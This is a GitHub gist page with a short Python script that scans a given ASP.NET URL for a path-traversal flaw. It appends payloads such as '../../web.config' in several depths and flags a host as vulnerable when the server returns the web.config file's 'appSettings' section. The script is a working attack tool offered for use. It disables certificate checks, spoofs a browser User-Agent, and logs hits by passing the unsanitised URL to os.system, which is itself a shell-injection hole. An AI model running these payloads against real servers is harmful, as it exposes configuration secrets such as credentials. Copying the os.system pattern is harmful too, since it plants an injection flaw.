Skip to content

Instantly share code, notes, and snippets.

@MrCl0wnLab

MrCl0wnLab/checker_vuln_web.config.py

Last active Aug 5, 2020
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Thanks @bminossi for sharing the exploration trick
Raw
checker_vuln_web.config.py
import os
import sys
import requests
import urllib3
from requests.exceptions import Timeout
urllib3.disable_warnings()
if sys.argv[1]:
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"}
xpl_list = [
'aspx?,../../web.config,,',
'aspx?,../../../web.config,,',
'aspx?,../../../../web.config,,',
'aspx?,../../../../../web.config,,'
]
for xpl in xpl_list:
try:
host = sys.argv[1].replace('aspx',xpl)
result_request = requests.get(host,timeout=(2, 5),verify=False, headers=headers)
if result_request.status_code == 200:
if 'appSettings' in result_request.text:
print(' [+] ',result_request.status_code,host,'[ VULN ]')
os.system(f"echo {host}>>vulns-web.config.txt")
else:
print(' [+] ',result_request.status_code,host,'[ NOT VULN ]')
except Timeout:
print(' [x] The request timed out')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment